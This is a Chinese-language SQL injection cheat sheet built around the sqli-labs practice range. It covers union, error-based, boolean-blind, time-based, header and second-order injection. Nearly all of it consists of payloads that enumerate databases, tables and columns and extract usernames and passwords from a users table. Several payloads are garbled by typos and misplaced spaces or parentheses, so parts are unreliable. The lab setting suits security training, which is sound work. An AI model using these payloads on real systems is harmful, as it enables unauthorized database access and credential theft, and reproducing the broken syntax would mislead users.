以sqli-labs靶场为例
一、联合查询注入(UNION query SQL injection)
order by x 判断列数
union select 1,2,3 查看显示位
爆破数据库版本,和当前数据库名称
union select 1,version(),database() --+
爆破库名:
union select 1,2,concat(schema_name) from information_schema.schema limit 0,1 --+(一个)
union select 1,2,group_concat(schema_name) from information_schema.schema --+ (所有)
爆破表名:
union select 1,database(),(select group_concat(table_name) from information_name.tables where table_name=database()) --+
爆破列名:
union select 1,database(),(select group_concat(column_name) from information_schema. tables where tables_schema = database() and table_name = ‘users’) --+
爆破数据:
union select 1,(select group_concat(id) from users),(select group_concat(username) fro m users) --+
二、报错注入(Error-based SQL injection)
extractvalue():
爆破数据:
extractvalue(1,concat(0x7e,database(),0x7e),3) --+
爆破库名:
extractvalue(1,concat(0x7e,(select schema_name from information_schema.schema),0x7 e)) --+
爆破表名:
extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where t able_schema = database()),0x7e)) --+
爆破列名:
extractvalue(1,concat(0x7e,(select column_name from information_schema.columns whe re schema_name=database() and table_name=’users’),0x7e),3) --+
爆破数据:
extractvalue(1,concat(0x7e,(select concat(id,0x7e,username,0x7e,password from users)),0 x7e),3) --+
updataxml():
同extractvalue()函数
floor():
and (select 1 from (select count(*),concat((select (select (SELECT distinct ‘sqly语句’)) from information_schema.tables),floor(rand(0)*2))x from information_schema.tables group by x)a) --+
三、布尔型注入(Boolean-based blind SQL injection)
1)判断长度
1.判断当前数据库的长度
and length(database())=8 --+
2.判断当前数据库里有几张表
and ((select count(*) from information_schema.tables where table_schema = database ())=4) --+
3.判断每张表的长度
and length((select table_name from information_schema.tables where table_schema=d atabase() limit 0,1))=6 --+
4.判断某张表的列数
and ((select count(*) from information_schema.columns where table_schema=database () and table_name=(select table_name from information_schema.tables where table_sc hema=database() limit 3,1))=3) --+
5.判断某张表里对应的字段的数据的长度
and length((select username from users where id =1))=4 --+
and length((select password from users where id =1))=4 --+
2)猜测内容
1.猜测当前数据库的名字:
and ascii(substr((select database()),1) =115 --+
2.猜测某张表的表名:
and ascii(substr((select table_name from information_schema.tables where table_sche ma=database() limit 3,1),5))=115 --+
3.猜测某张表的某个列名:
and ascii(substr((select column_name from information_schema.columns where table_s chema=database() and table_name=(select table_name from information_schema.tables where table_schema=database() limit 3,1) limit 1,1),8))=101 --+
4.猜测某张表里列名为username的数据
and ascii(substr((select username from users limit 0,1),1)) = 68 --+
四、延时注入(Time-based blind SQL injection)
1.注入点判断
and sleep(5) --+
2. if(表达式,值1,值2)
可以与盲注结合,形成基于时间的盲注
and if(length(database())=8,sleep(5),1) --+
五、堆叠注入,可多语句查询注入(Stacked queries SQL injection)
六、http头部注入
1.User-Agent 头字段注入
2.Referer 头字段注入
3.Cookie 头字段注入
4.二次注入
1、创建一个 对应的用户 ’#。改这个新创建的用户的密码。对应的用户密码就会被更 改,这个新建的用户的面膜没有被更改